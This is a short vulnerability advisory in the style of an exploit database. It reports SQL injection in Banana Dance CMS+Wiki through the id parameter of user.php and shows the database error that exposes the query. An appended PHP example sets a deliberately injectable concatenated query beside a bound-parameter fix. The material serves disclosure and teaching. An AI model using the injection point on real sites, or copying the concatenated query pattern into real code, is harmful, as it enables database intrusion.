+-----------------------+
| Banana Dance CMS+Wiki |
+-----------------------+
Vulnerable Web-App : Banana Dance CMS+Wiki
Vulnerability: SQLi
Author : Aodrulez.
Email: f3arm3d3ar@gmail.com
Google-Dork: :) Guess it.
Tested on: Ubuntu 10.04
Web-App: http://www.doyoubananadance.com/
Download Link: http://www.doyoubananadance.com/functions/dl.php?file=4e84e50f89bf7
+---------+
| Details |
+---------+
1] SQLi
Exploit : http://localhost/user.php?id=1'[sqli]
Error:
------
Invalid query:
SELECT `key`,`value` FROM `bd_user_data` WHERE `user_id`='1''
Error: You have an error in your SQL syntax; check the manual
that corresponds to your MySQL server version for the right
syntax to use near ''1''' at line 1

+----------+
|  MalCon  |
+----------+
(International Malware Conference)
The CFP for MalCon-2011 is ON!
If you think you are good enough, try cracking our
'Capture the Mal Challenge-2011' online.
Open to everyone!
For more details, visit http://malcon.org
+-------------------+
| Greetz Fly Out To |
+-------------------+
1] Amforked(): My Mentor.
2] The Blue Genius : My Boss.
3] str0ke (milw0rm)
4] www.orchidseven.com
5] www.malcon.org
6] www.isac.org.in
7] www.nsd.org.in
8] LiquidWorm
+-------+
| Quote |
+-------+
"Microsoft is not the answer. Microsoft is the question. NO is the answer."
- Erik Naggum
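
Added example (not part of the original advisory and not Banana Dance source code): the failing query in the Details section shows the id value placed between single quotes inside the SQL text. The PHP sketch below reproduces that pattern next to a validated, bound-parameter version; the function names, the sample rows and the in-memory SQLite database standing in for MySQL are assumptions made so it runs offline.

```php
<?php
// Hypothetical reconstruction for illustration; requires the pdo_sqlite extension.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE `bd_user_data` (`user_id` INTEGER, `key` TEXT, `value` TEXT)');
// Constructed sample rows.
$pdo->exec("INSERT INTO `bd_user_data` VALUES (1, 'nick', 'alice'), (2, 'nick', 'bob')");

// Pattern implied by the error message: the request value is pasted
// between quotes, so a quote in the value changes the statement itself.
function lookup_concat(PDO $pdo, string $id): array
{
    $sql = "SELECT `key`,`value` FROM `bd_user_data` WHERE `user_id`='" . $id . "'";
    return $pdo->query($sql)->fetchAll(PDO::FETCH_KEY_PAIR);
}

// Hardened form: reject anything that is not a positive integer, then
// pass the value as a bound parameter so it never becomes SQL text.
function lookup_bound(PDO $pdo, string $id): array
{
    $uid = filter_var($id, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($uid === false) {
        return []; // non-numeric id: no query is issued at all
    }
    $stmt = $pdo->prepare('SELECT `key`,`value` FROM `bd_user_data` WHERE `user_id` = :uid');
    $stmt->bindValue(':uid', $uid, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_KEY_PAIR);
}

// "1" is a normal request; "1'" is the input shown in the advisory.
foreach (['1', "1'"] as $id) {
    try {
        $rows = lookup_concat($pdo, $id);
        echo "concat id=$id -> " . json_encode($rows) . "\n";
    } catch (PDOException $e) {
        // The database error should be logged server-side, not echoed to the client.
        echo "concat id=$id -> query broke: " . $e->getMessage() . "\n";
    }
    echo "bound  id=$id -> " . json_encode(lookup_bound($pdo, $id)) . "\n";
}
```

The advisory's output also shows the full query and MySQL error being returned to the browser; production code should log such errors and return a generic message instead.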